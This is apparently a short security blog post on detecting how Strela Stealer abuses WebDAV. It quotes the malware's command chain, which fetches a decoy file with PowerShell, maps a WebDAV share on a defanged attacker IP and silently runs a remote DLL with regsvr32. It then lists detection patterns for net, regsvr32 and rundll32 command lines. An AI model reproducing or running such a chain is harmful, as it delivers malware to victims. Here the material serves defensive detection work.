043. Strela Stealer: Detecting WebDAV Abuse

Hello everyone! Have you ever seen adversaries use WebDAV servers to host malware? Yes, of course! So today we're going to look and detection opportunities related to such activity.


Let's look at recent Strela Stealer infection chain, presented by Unit42. The threat actors distributed the stealer through email attachments of zip archives containing JS files.

So, the JS file executes the following script:

cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\\invoice.pdf hxxp[:]//193.143.1[.]205/invoice.php" && start %temp%\\invoice.pdf && cmd /c net use \\\\193.143.1[.]205@8888\\davwwwroot\\ && cmd /c regsvr32 /s \\\\193.143.1[.]205@8888\\davwwwroot\\281681957614368.dll

Ok, the threat actors abuse PowerShell, but not for malware downloading, but to download and save a decoy document. 

Next, the most interesting thing - using WebDAV. Here's what to look for:

  • Execution of net with "use" and "davwwwroot" in the command line
  • Execution of regsvr32 or rundll32 with "davwwwroot" in the command line
Quite easy, right?

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

001. The Zeltser Challenge

012. They Want to Know Everything About Your System!